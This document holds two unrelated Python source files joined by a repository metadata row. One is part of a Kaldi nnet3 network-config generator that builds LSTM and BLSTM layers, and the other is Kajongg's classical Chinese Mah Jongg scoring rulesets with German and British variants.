    return {'descriptor': '{0}_log_softmax'.format(name), 'dimension': dim}
def AddSigmoidLayer(config_lines, name, input, self_repair_scale = None):
    """Add a SigmoidComponent over the input's dimension.

    Bug fix: the component format string previously had no {2} placeholder,
    so self_repair_scale was computed but silently dropped from the config
    line (compare the relu line in AddAffRelNormLayer).
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    # self_repair_scale is a constant scaling the self-repair vector computed in SigmoidComponent
    self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale) if self_repair_scale is not None else ''
    components.append("component name={0}_sigmoid type=SigmoidComponent dim={1} {2}".format(name, input['dimension'], self_repair_string))
    component_nodes.append("component-node name={0}_sigmoid component={0}_sigmoid input={1}".format(name, input['descriptor']))
    return {'descriptor': '{0}_sigmoid'.format(name),
            'dimension': input['dimension']}
def AddOutputLayer(config_lines, input, label_delay = None, suffix = None, objective_type = "linear"):
    """Append an output-node, optionally time-shifted by label_delay.

    The node is named 'output' or 'output-<suffix>'.  Returns None; the
    result is the line appended to config_lines['component-nodes'].
    """
    name = 'output' if suffix is None else 'output-{0}'.format(suffix)
    if label_delay is None:
        node = 'output-node name={0} input={1} objective={2}'.format(
            name, input['descriptor'], objective_type)
    else:
        # Offset(...) shifts the input in time by label_delay frames.
        node = 'output-node name={0} input=Offset({1},{2}) objective={3}'.format(
            name, input['descriptor'], label_delay, objective_type)
    config_lines['component-nodes'].append(node)
def AddFinalLayer(config_lines, input, output_dim,
                  ng_affine_options = " param-stddev=0 bias-stddev=0 ",
                  max_change_per_component = 1.5,
                  label_delay=None,
                  use_presoftmax_prior_scale = False,
                  prior_scale_file = None,
                  include_log_softmax = True,
                  add_final_sigmoid = False,
                  name_affix = None,
                  objective_type = "linear"):
    """Add the final affine layer, an optional log-softmax or sigmoid, and
    the output node.

    name_affix is used as a *prefix* on the affine/fixed-scale nodes but as
    a *suffix* on the output node (see the AddOutputLayer call).
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']

    final_node_prefix = 'Final' if name_affix is None else 'Final-' + str(name_affix)

    prev_layer_output = AddAffineLayer(
        config_lines, final_node_prefix, input, output_dim,
        ng_affine_options, max_change_per_component)

    if include_log_softmax:
        if use_presoftmax_prior_scale:
            # Scale the pre-softmax activations by per-class priors.
            components.append('component name={0}-fixed-scale type=FixedScaleComponent scales={1}'.format(final_node_prefix, prior_scale_file))
            component_nodes.append('component-node name={0}-fixed-scale component={0}-fixed-scale input={1}'.format(final_node_prefix, prev_layer_output['descriptor']))
            prev_layer_output['descriptor'] = "{0}-fixed-scale".format(final_node_prefix)
        prev_layer_output = AddSoftmaxLayer(config_lines, final_node_prefix, prev_layer_output)
    elif add_final_sigmoid:
        # Useful when the final outputs must be probabilities between 0 and
        # 1, usually together with an objective-type such as "quadratic".
        prev_layer_output = AddSigmoidLayer(config_lines, final_node_prefix, prev_layer_output)

    AddOutputLayer(config_lines, prev_layer_output, label_delay,
                   suffix = name_affix, objective_type = objective_type)
def AddLstmLayer(config_lines,
                 name, input, cell_dim,
                 recurrent_projection_dim = 0,
                 non_recurrent_projection_dim = 0,
                 clipping_threshold = 30.0,
                 zeroing_threshold = 15.0,
                 zeroing_interval = 20,
                 ng_per_element_scale_options = "",
                 ng_affine_options = "",
                 lstm_delay = -1,
                 self_repair_scale_nonlinearity = None,
                 max_change_per_component = 0.75):
    """Add one (optionally projected) LSTM layer in nnet3 config format.

    Emits the components and component-nodes for an LSTM cell with peephole
    connections; recurrences are wrapped in BackpropTruncationComponent for
    gradient clipping/zeroing.

    Key parameters:
      input: dict with 'descriptor' and 'dimension' of the incoming layer.
      cell_dim: dimension of the cell state c_t.
      recurrent_projection_dim / non_recurrent_projection_dim: if non-zero,
        the cell output m_t is projected (LSTMP); only the recurrent part
        feeds back.
      lstm_delay: time offset of the recurrence (negative for a forward
        LSTM, positive for the backward half of a BLSTM).

    Returns a dict with the output 'descriptor' and its 'dimension'.
    """
    assert(recurrent_projection_dim >= 0 and non_recurrent_projection_dim >= 0)
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']

    input_descriptor = input['descriptor']
    input_dim = input['dimension']
    name = name.strip()

    # With no recurrent projection the raw cell output m_t recurs directly.
    if (recurrent_projection_dim == 0):
        add_recurrent_projection = False
        recurrent_projection_dim = cell_dim
        recurrent_connection = "m_t"
    else:
        add_recurrent_projection = True
        recurrent_connection = "r_t"
    if (non_recurrent_projection_dim == 0):
        add_non_recurrent_projection = False
    else:
        add_non_recurrent_projection = True

    # self_repair_scale_nonlinearity is a constant scaling the self-repair vector computed in derived classes of NonlinearComponent,
    # i.e., SigmoidComponent, TanhComponent and RectifiedLinearComponent
    self_repair_nonlinearity_string = "self-repair-scale={0:.10f}".format(self_repair_scale_nonlinearity) if self_repair_scale_nonlinearity is not None else ''
    # Natural gradient per element scale parameters
    ng_per_element_scale_options += " param-mean=0.0 param-stddev=1.0 "
    # Per-component max-change option
    max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''

    # Parameter Definitions W*(* replaced by - to have valid names)
    components.append("# Input gate control : W_i* matrices")
    components.append("component name={0}_W_i-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_ic type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
    components.append("# Forget gate control : W_f* matrices")
    components.append("component name={0}_W_f-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_fc type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
    components.append("# Output gate control : W_o* matrices")
    components.append("component name={0}_W_o-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_oc type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
    components.append("# Cell input matrices : W_c* matrices")
    components.append("component name={0}_W_c-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))

    components.append("# Defining the non-linearities")
    components.append("component name={0}_i type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
    components.append("component name={0}_f type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
    components.append("component name={0}_o type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
    components.append("component name={0}_g type=TanhComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
    components.append("component name={0}_h type=TanhComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))

    components.append("# Defining the cell computations")
    components.append("component name={0}_c1 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_c2 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_m type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_c type=BackpropTruncationComponent dim={1} "
                      "clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
                      "recurrence-interval={5}".format(name, cell_dim, clipping_threshold, zeroing_threshold,
                                                       zeroing_interval, abs(lstm_delay)))

    # c1_t and c2_t defined below
    component_nodes.append("component-node name={0}_c_t component={0}_c input=Sum({0}_c1_t, {0}_c2_t)".format(name))
    # Previous-frame cell state; IfDefined handles the start of the sequence.
    c_tminus1_descriptor = "IfDefined(Offset({0}_c_t, {1}))".format(name, lstm_delay)

    component_nodes.append("# i_t")
    component_nodes.append("component-node name={0}_i1 component={0}_W_i-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_i2 component={0}_w_ic input={1}".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_i_t component={0}_i input=Sum({0}_i1, {0}_i2)".format(name))

    component_nodes.append("# f_t")
    component_nodes.append("component-node name={0}_f1 component={0}_W_f-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_f2 component={0}_w_fc input={1}".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_f_t component={0}_f input=Sum({0}_f1,{0}_f2)".format(name))

    component_nodes.append("# o_t")
    component_nodes.append("component-node name={0}_o1 component={0}_W_o-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_o2 component={0}_w_oc input={0}_c_t".format(name))
    component_nodes.append("component-node name={0}_o_t component={0}_o input=Sum({0}_o1, {0}_o2)".format(name))

    component_nodes.append("# h_t")
    component_nodes.append("component-node name={0}_h_t component={0}_h input={0}_c_t".format(name))

    component_nodes.append("# g_t")
    component_nodes.append("component-node name={0}_g1 component={0}_W_c-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_g_t component={0}_g input={0}_g1".format(name))

    component_nodes.append("# parts of c_t")
    component_nodes.append("component-node name={0}_c1_t component={0}_c1 input=Append({0}_f_t, {1})".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_c2_t component={0}_c2 input=Append({0}_i_t, {0}_g_t)".format(name))

    component_nodes.append("# m_t")
    component_nodes.append("component-node name={0}_m_t component={0}_m input=Append({0}_o_t, {0}_h_t)".format(name))

    # add the recurrent connections
    if (add_recurrent_projection and add_non_recurrent_projection):
        # One combined projection W-m; the first recurrent_projection_dim
        # rows (r_t) feed back, the rest (p_t) only feed forward.
        components.append("# projection matrices : Wrm and Wpm")
        components.append("component name={0}_W-m type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, cell_dim, recurrent_projection_dim + non_recurrent_projection_dim, ng_affine_options, max_change_options))
        components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
                          "clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
                          "recurrence-interval={5}".format(name, recurrent_projection_dim, clipping_threshold,
                                                           zeroing_threshold, zeroing_interval, abs(lstm_delay)))
        component_nodes.append("# r_t and p_t")
        component_nodes.append("component-node name={0}_rp_t component={0}_W-m input={0}_m_t".format(name))
        component_nodes.append("dim-range-node name={0}_r_t_preclip input-node={0}_rp_t dim-offset=0 dim={1}".format(name, recurrent_projection_dim))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
        output_descriptor = '{0}_rp_t'.format(name)
        output_dim = recurrent_projection_dim + non_recurrent_projection_dim
    elif add_recurrent_projection:
        components.append("# projection matrices : Wrm")
        components.append("component name={0}_Wrm type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(
            name, cell_dim, recurrent_projection_dim, ng_affine_options, max_change_options))
        components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
                          "clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
                          "recurrence-interval={5}".format(name, recurrent_projection_dim, clipping_threshold,
                                                           zeroing_threshold, zeroing_interval, abs(lstm_delay)))
        component_nodes.append("# r_t")
        component_nodes.append("component-node name={0}_r_t_preclip component={0}_Wrm input={0}_m_t".format(name))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
        output_descriptor = '{0}_r_t'.format(name)
        output_dim = recurrent_projection_dim
    else:
        # No projection at all: clip m_t itself and use it as the output.
        components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
                          "clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
                          "recurrence-interval={5}".format(name, cell_dim, clipping_threshold,
                                                           zeroing_threshold, zeroing_interval, abs(lstm_delay)))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_m_t".format(name))
        output_descriptor = '{0}_r_t'.format(name)
        output_dim = cell_dim

    return {
        'descriptor': output_descriptor,
        'dimension':output_dim
    }
def AddBLstmLayer(config_lines,
                 name, input, cell_dim,
                 recurrent_projection_dim = 0,
                 non_recurrent_projection_dim = 0,
                 clipping_threshold = 1.0,
                 zeroing_threshold = 3.0,
                 zeroing_interval = 20,
                 ng_per_element_scale_options = "",
                 ng_affine_options = "",
                 lstm_delay = [-1,1],
                 self_repair_scale_nonlinearity = None,
                 max_change_per_component = 0.75):
    """Add a bidirectional LSTM layer: one forward and one backward
    unidirectional LSTM over the same input, outputs Append()-ed together.

    lstm_delay must hold exactly two recurrence delays: a negative one for
    the forward direction and a positive one for the backward direction.
    Returns a dict with the combined output 'descriptor' and its total
    'dimension' (sum of both directions).
    """
    assert(len(lstm_delay) == 2 and lstm_delay[0] < 0 and lstm_delay[1] > 0)
    # Build the two unidirectional layers with identical settings; only the
    # name suffix and the sign of the recurrence delay differ.
    per_direction = []
    for direction, delay in zip(("forward", "backward"), lstm_delay):
        per_direction.append(AddLstmLayer(config_lines = config_lines,
                                          name = "{0}_{1}".format(name, direction),
                                          input = input,
                                          cell_dim = cell_dim,
                                          recurrent_projection_dim = recurrent_projection_dim,
                                          non_recurrent_projection_dim = non_recurrent_projection_dim,
                                          clipping_threshold = clipping_threshold,
                                          zeroing_threshold = zeroing_threshold,
                                          zeroing_interval = zeroing_interval,
                                          ng_per_element_scale_options = ng_per_element_scale_options,
                                          ng_affine_options = ng_affine_options,
                                          lstm_delay = delay,
                                          self_repair_scale_nonlinearity = self_repair_scale_nonlinearity,
                                          max_change_per_component = max_change_per_component))
    output_forward, output_backward = per_direction
    return {
        'descriptor': 'Append({0}, {1})'.format(output_forward['descriptor'],
                                                output_backward['descriptor']),
        'dimension': output_forward['dimension'] + output_backward['dimension']
    }
| michellemorales/OpenMM | kaldi/egs/wsj/s5/steps/nnet3/components.py | Python | gpl-2.0 | 29,765 |
# -*- coding: utf-8 -*-
"""Copyright (C) 2009,2010 Wolfgang Rohdewald <wolfgang@rohdewald.de>
kajongg is free software you can redistribute it and/or modifys
it under the terms of the GNU General Public License as published by
the Free Software Foundation either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
# See the user manual for a description of how to define rulesets.
# Names and descriptions must be english and may only contain ascii chars.
# Because kdecore.i18n() only accepts 8bit characters, no unicode.
# The KDE translation teams will "automatically" translate name and
# description into many languages.
from rule import Rule, PredefinedRuleset
from util import m18nE, m18n
class ClassicalChinese(PredefinedRuleset):
    """classical chinese rules, standard rules. Serves as a basis
    for local variants. This should be defined such that the
    sum of the differences to the local variants is minimized."""
    def __init__(self, name=None):
        PredefinedRuleset.__init__(self, name or m18nE('Classical Chinese standard'))
    def initRuleset(self):
        """sets the description"""
        self.description = m18n('Classical Chinese')
    def addManualRules(self):
        """those are actually winner rules but in the kajongg scoring mode they must be selected manually"""
        # Rule definition strings follow the pattern '<function>||O<option>';
        # e.g. 'Olastsource=e' encodes how the last tile was obtained.
        # NOTE(review): presumably parsed by rule.Rule -- confirm in rule.py.
        # applicable only if we have a concealed meld and a declared kong:
        self.winnerRules.add(Rule('Last Tile Taken from Dead Wall',
                'FLastTileFromDeadWall||Olastsource=e', doubles=1,
                description=m18n('The dead wall is also called kong box: The last 16 tiles of the wall '
                'used as source of replacement tiles')))
        self.winnerRules.add(Rule('Last Tile is Last Tile of Wall',
                'FIsLastTileFromWall||Olastsource=z', doubles=1,
                description=m18n('Winner said Mah Jong with the last tile taken from the living end of the wall')))
        self.winnerRules.add(Rule('Last Tile is Last Tile of Wall Discarded',
                'FIsLastTileFromWallDiscarded||Olastsource=Z', doubles=1,
                description=m18n('Winner said Mah Jong by claiming the last tile taken from the living end of the '
                'wall, discarded by another player')))
        # NOTE(review): debug=True looks like leftover debugging aid -- confirm
        # it is intentional for this one rule only.
        self.winnerRules.add(Rule('Robbing the Kong', r'FRobbingKong||Olastsource=k', doubles=1,
                description=m18n('Winner said Mah Jong by claiming the 4th tile of a kong another player '
                'just declared'), debug=True))
        self.winnerRules.add(Rule('Mah Jongg with Original Call',
                'FMahJonggWithOriginalCall||Odeclaration=a', doubles=1,
                description=m18n(
                'Just before the first discard, a player can declare Original Call meaning she needs only one '
                'tile to complete the hand and announces she will not alter the hand in any way (except bonus tiles)')))
        self.winnerRules.add(Rule('Dangerous Game', 'FDangerousGame||Opayforall',
                description=m18n('In some situations discarding a tile that has a high chance to help somebody to win '
                'is declared to be dangerous, and if that tile actually makes somebody win, the discarder '
                'pays the winner for all')))
        self.winnerRules.add(Rule('Twofold Fortune', 'FTwofoldFortune||Odeclaration=t',
                limits=1, description=m18n('Kong after Kong: Declare Kong and a second Kong with the replacement '
                'tile and Mah Jong with the second replacement tile')))
        # limit hands:
        # NOTE(review): both Blessings use Olastsource=1; verify Blessing of
        # Earth should not carry a distinct last-source code.
        self.winnerRules.add(Rule('Blessing of Heaven', 'FBlessingOfHeaven||Olastsource=1', limits=1,
                description=m18n('East says Mah Jong with the unmodified dealt tiles')))
        self.winnerRules.add(Rule('Blessing of Earth', 'FBlessingOfEarth||Olastsource=1', limits=1,
                description=m18n('South, West or North says Mah Jong with the first tile discarded by East')))
        # the next rule is never proposed, the program applies it when appropriate. Do not change the XEAST9X.
        # XEAST9X is meant to never match a hand, and the program will identify this rule by searching for XEAST9X
        self.winnerRules.add(Rule('East won nine times in a row', r'XEAST9X||Oabsolute', limits=1,
                description=m18n('If that happens, East gets a limit score and the winds rotate')))
    def addPenaltyRules(self):
        """as the name says"""
        self.penaltyRules.add(Rule(
                'False Naming of Discard, Claimed for Mah Jongg and False Declaration of Mah Jongg',
                'Oabsolute payers=2 payees=2', points = -300))
    def addHandRules(self):
        """as the name says"""
        self.handRules.add(Rule('Own Flower and Own Season', 'FOwnFlowerOwnSeason', doubles=1))
        self.handRules.add(Rule('All Flowers', 'FAllFlowers', doubles=1))
        self.handRules.add(Rule('All Seasons', 'FAllSeasons', doubles=1))
        self.handRules.add(Rule('Three Concealed Pongs', 'FThreeConcealedPongs', doubles=1))
        self.handRules.add(Rule('Long Hand', r'FLongHand||Oabsolute', points=0,
                description=m18n('The hand contains too many tiles')))
    def addParameterRules(self):
        """as the name says"""
        self.parameterRules.add(Rule('Points Needed for Mah Jongg', 'intminMJPoints||Omandatory', parameter=0))
        # NOTE(review): 'OMandatory' (capital M) here and below differs from
        # 'Omandatory' used elsewhere -- confirm option parsing is
        # case-insensitive or unify the spelling.
        self.parameterRules.add(Rule('Minimum number of doubles needed for Mah Jongg',
                'intminMJDoubles||OMandatory', parameter=0))
        self.parameterRules.add(Rule('Points for a Limit Hand', 'intlimit||Omandatory||Omin=1', parameter=500))
        # TODO: we are in string freeze, so for now we just add this option but make it noneditable
        msg = ''
        self.parameterRules.add(Rule(msg, 'boolroofOff||Omandatory', parameter=False))
        self.parameterRules.add(Rule('Claim Timeout', 'intclaimTimeout||Omandatory', parameter=10))
        self.parameterRules.add(Rule('Size of Kong Box', 'intkongBoxSize||Omandatory', parameter=16,
                description=m18n('The Kong Box is used for replacement tiles when declaring kongs')))
        self.parameterRules.add(Rule('Play with Bonus Tiles', 'boolwithBonusTiles||OMandatory', parameter=True,
                description=m18n('Bonus tiles increase the luck factor')))
        self.parameterRules.add(Rule('Minimum number of rounds in game', 'intminRounds||OMandatory', parameter=4))
        self.parameterRules.add(Rule('number of allowed chows', 'intmaxChows||Omandatory', parameter=4,
                description=m18n('The number of chows a player may build')))
        self.parameterRules.add(Rule('must declare calling hand',
                'boolmustDeclareCallingHand||Omandatory', parameter=False,
                description=m18n('Mah Jongg is only allowed after having declared to have a calling hand')))
    def loadRules(self):
        """define the rules"""
        self.addParameterRules() # must be first!
        self.addPenaltyRules()
        self.addHandRules()
        self.addManualRules()
        self.winnerRules.add(Rule('Last Tile Completes Pair of 2..8', 'FLastTileCompletesPairMinor', points=2))
        self.winnerRules.add(Rule('Last Tile Completes Pair of Terminals or Honors',
                'FLastTileCompletesPairMajor', points=4))
        self.winnerRules.add(Rule('Last Tile is Only Possible Tile', 'FLastOnlyPossible', points=4))
        self.winnerRules.add(Rule('Won with Last Tile Taken from Wall', 'FLastFromWall', points=2))
        self.winnerRules.add(Rule('Zero Point Hand', 'FZeroPointHand', doubles=1,
                description=m18n('The hand has 0 basis points excluding bonus tiles')))
        self.winnerRules.add(Rule('No Chow', 'FNoChow', doubles=1))
        self.winnerRules.add(Rule('Only Concealed Melds', 'FOnlyConcealedMelds', doubles=1))
        self.winnerRules.add(Rule('False Color Game', 'FFalseColorGame', doubles=1,
                description=m18n('Only same-colored tiles (only bamboo/stone/character) '
                'plus any number of winds and dragons')))
        self.winnerRules.add(Rule('True Color Game', 'FTrueColorGame', doubles=3,
                description=m18n('Only same-colored tiles (only bamboo/stone/character)')))
        self.winnerRules.add(Rule('Concealed True Color Game', 'FConcealedTrueColorGame',
                limits=1, description=m18n('All tiles concealed and of the same suit, no honors')))
        self.winnerRules.add(Rule('Only Terminals and Honors', 'FOnlyMajors', doubles=1,
                description=m18n('Only winds, dragons, 1 and 9')))
        self.winnerRules.add(Rule('Only Honors', 'FOnlyHonors', limits=1,
                description=m18n('Only winds and dragons')))
        self.winnerRules.add(Rule('Hidden Treasure', 'FHiddenTreasure', limits=1,
                description=m18n('Only hidden Pungs or Kongs, last tile from wall')))
        self.winnerRules.add(Rule('Heads and Tails', 'FAllTerminals', limits=1,
                description=m18n('Only 1 and 9')))
        self.winnerRules.add(Rule('Fourfold Plenty', 'FFourfoldPlenty', limits=1,
                description=m18n('4 Kongs')))
        self.winnerRules.add(Rule('Three Great Scholars', 'FThreeGreatScholars', limits=1,
                description=m18n('3 Pungs or Kongs of dragons')))
        self.winnerRules.add(Rule('Four Blessings Hovering Over the Door',
                'FFourBlessingsHoveringOverTheDoor', limits=1,
                description=m18n('4 Pungs or Kongs of winds')))
        self.winnerRules.add(Rule('All Greens', 'FAllGreen', limits=1,
                description=m18n('Only green tiles: Green dragon and Bamboo 2,3,4,6,8')))
        self.winnerRules.add(Rule('Gathering the Plum Blossom from the Roof',
                'FGatheringPlumBlossomFromRoof', limits=1,
                description=m18n('Mah Jong with stone 5 from the dead wall')))
        self.winnerRules.add(Rule('Plucking the Moon from the Bottom of the Sea', 'FPluckingMoon', limits=1,
                description=m18n('Mah Jong with the last tile from the wall being a stone 1')))
        self.winnerRules.add(Rule('Scratching a Carrying Pole', 'FScratchingPole', limits=1,
                description=m18n('Robbing the Kong of bamboo 2')))
        # only hands matching an mjRule can win. Keep this list as short as
        # possible. If a special hand matches the standard pattern, do not put it here
        # All mjRule functions must have a winningTileCandidates() method
        self.mjRules.add(Rule('Standard Mah Jongg', 'FStandardMahJongg', points=20))
        self.mjRules.add(Rule('Nine Gates', 'FGatesOfHeaven||OlastExtra', limits=1,
                description=m18n('All tiles concealed of same color: Values 1-1-1-2-3-4-5-6-7-8-9-9-9 completed '
                'with another tile of the same color (from wall or discarded)')))
        self.mjRules.add(Rule('Thirteen Orphans', 'FThirteenOrphans||Omayrobhiddenkong', limits=1,
                description=m18n('13 single tiles: All dragons, winds, 1, 9 and a 14th tile building a pair '
                'with one of them')))
        # doubling melds:
        self.meldRules.add(Rule('Pung/Kong of Dragons', 'FDragonPungKong', doubles=1))
        self.meldRules.add(Rule('Pung/Kong of Own Wind', 'FOwnWindPungKong', doubles=1))
        self.meldRules.add(Rule('Pung/Kong of Round Wind', 'FRoundWindPungKong', doubles=1))
        # exposed melds:
        self.meldRules.add(Rule('Exposed Kong', 'FExposedMinorKong', points=8))
        self.meldRules.add(Rule('Exposed Kong of Terminals', 'FExposedTerminalsKong', points=16))
        self.meldRules.add(Rule('Exposed Kong of Honors', 'FExposedHonorsKong', points=16))
        self.meldRules.add(Rule('Exposed Pung', 'FExposedMinorPung', points=2))
        self.meldRules.add(Rule('Exposed Pung of Terminals', 'FExposedTerminalsPung', points=4))
        self.meldRules.add(Rule('Exposed Pung of Honors', 'FExposedHonorsPung', points=4))
        # concealed melds:
        self.meldRules.add(Rule('Concealed Kong', 'FConcealedMinorKong', points=16))
        self.meldRules.add(Rule('Concealed Kong of Terminals', 'FConcealedTerminalsKong', points=32))
        self.meldRules.add(Rule('Concealed Kong of Honors', 'FConcealedHonorsKong', points=32))
        self.meldRules.add(Rule('Concealed Pung', 'FConcealedMinorPung', points=4))
        self.meldRules.add(Rule('Concealed Pung of Terminals', 'FConcealedTerminalsPung', points=8))
        self.meldRules.add(Rule('Concealed Pung of Honors', 'FConcealedHonorsPung', points=8))
        self.meldRules.add(Rule('Pair of Own Wind', 'FOwnWindPair', points=2))
        self.meldRules.add(Rule('Pair of Round Wind', 'FRoundWindPair', points=2))
        self.meldRules.add(Rule('Pair of Dragons', 'FDragonPair', points=2))
        # bonus tiles:
        self.meldRules.add(Rule('Flower', 'FFlower', points=4))
        self.meldRules.add(Rule('Season', 'FSeason', points=4))
class ClassicalChineseDMJL(ClassicalChinese):
    """classical chinese rules, German rules"""
    def __init__(self, name=None):
        ClassicalChinese.__init__(self, name or m18nE('Classical Chinese DMJL'))
    def initRuleset(self):
        """sets the description"""
        ClassicalChinese.initRuleset(self)
        self.description = m18n('Classical Chinese as defined by the Deutsche Mah Jongg Liga (DMJL) e.V.')
    def loadRules(self):
        """load the standard rules, then apply the DMJL-specific deltas"""
        ClassicalChinese.loadRules(self)
        # the squirming snake is only covered by standard mahjongg rule if tiles are ordered
        self.mjRules.add(Rule('Squirming Snake', 'FSquirmingSnake', limits=1,
                description=m18n('All tiles of same color. Pung or Kong of 1 and 9, pair of 2, 5 or 8 and two '
                'Chows of the remaining values')))
        self.handRules.add(Rule('Little Three Dragons', 'FLittleThreeDragons', doubles=1,
                description=m18n('2 Pungs or Kongs of dragons and 1 pair of dragons')))
        self.handRules.add(Rule('Big Three Dragons', 'FBigThreeDragons', doubles=2,
                description=m18n('3 Pungs or Kongs of dragons')))
        self.handRules.add(Rule('Little Four Joys', 'FLittleFourJoys', doubles=1,
                description=m18n('3 Pungs or Kongs of winds and 1 pair of winds')))
        self.handRules.add(Rule('Big Four Joys', 'FBigFourJoys', doubles=2,
                description=m18n('4 Pungs or Kongs of winds')))
        # NOTE(review): this assigns rule.doubles directly, while BMJA below
        # uses rule.score.doubles -- confirm both spellings hit the same field.
        self.winnerRules['Only Honors'].doubles = 2
        # NOTE(review): unlike the other penalty rules, the next two omit the
        # options string (payers/payees) -- confirm the defaults are intended.
        self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Chow', points = -50))
        self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Pung/Kong', points = -100))
        self.penaltyRules.add(Rule('False Declaration of Mah Jongg by One Player',
                'Oabsolute payees=3', points = -300))
        self.penaltyRules.add(Rule('False Declaration of Mah Jongg by Two Players',
                'Oabsolute payers=2 payees=2', points = -300))
        self.penaltyRules.add(Rule('False Declaration of Mah Jongg by Three Players',
                'Oabsolute payers=3', points = -300))
        self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Mah Jongg',
                'Oabsolute payees=3', points = -300))
class ClassicalChineseBMJA(ClassicalChinese):
    """classical chinese rules, British rules"""
    def __init__(self, name=None):
        ClassicalChinese.__init__(self, name or m18nE('Classical Chinese BMJA'))
    def initRuleset(self):
        """sets the description"""
        ClassicalChinese.initRuleset(self)
        self.description = m18n('Classical Chinese as defined by the British Mah-Jong Association')
    def addParameterRules(self):
        """those differ for BMJA from standard"""
        ClassicalChinese.addParameterRules(self)
        # override the standard parameter defaults with the BMJA values
        self.parameterRules['Size of Kong Box'].parameter = 14
        self.parameterRules['number of allowed chows'].parameter = 1
        self.parameterRules['Points for a Limit Hand'].parameter = 1000
        self.parameterRules['must declare calling hand'].parameter = True
    def loadRules(self):
        """load the standard rules, then delete/rename/replace for BMJA"""
        # TODO: we need a separate part for any number of announcements. Both r for robbing kong and a for
        # Original Call can be possible together.
        ClassicalChinese.loadRules(self)
        del self.winnerRules['Zero Point Hand']
        # Original Call is a hand rule under BMJA, not a winner rule:
        # move it over and shorten the name.
        originalCall = self.winnerRules.pop('Mah Jongg with Original Call')
        originalCall.name = m18n('Original Call')
        self.handRules.add(originalCall)
        del self.mjRules['Nine Gates']
        self.mjRules.add(Rule('Gates of Heaven', 'FGatesOfHeaven||Opair28', limits=1,
                description=m18n('All tiles concealed of same color: Values 1-1-1-2-3-4-5-6-7-8-9-9-9 and '
                'another tile 2..8 of the same color')))
        self.mjRules.add(Rule('Wriggling Snake', 'FWrigglingSnake', limits=1,
                description=m18n('Pair of 1s and a run from 2 to 9 in the same suit with each of the winds')))
        self.mjRules.add(Rule('Triple Knitting', 'FTripleKnitting', limits=0.5,
                description=m18n('Four sets of three tiles in the different suits and a pair: No Winds or Dragons')))
        self.mjRules.add(Rule('Knitting', 'FKnitting', limits=0.5,
                description=m18n('7 pairs of tiles in any 2 out of 3 suits; no Winds or Dragons')))
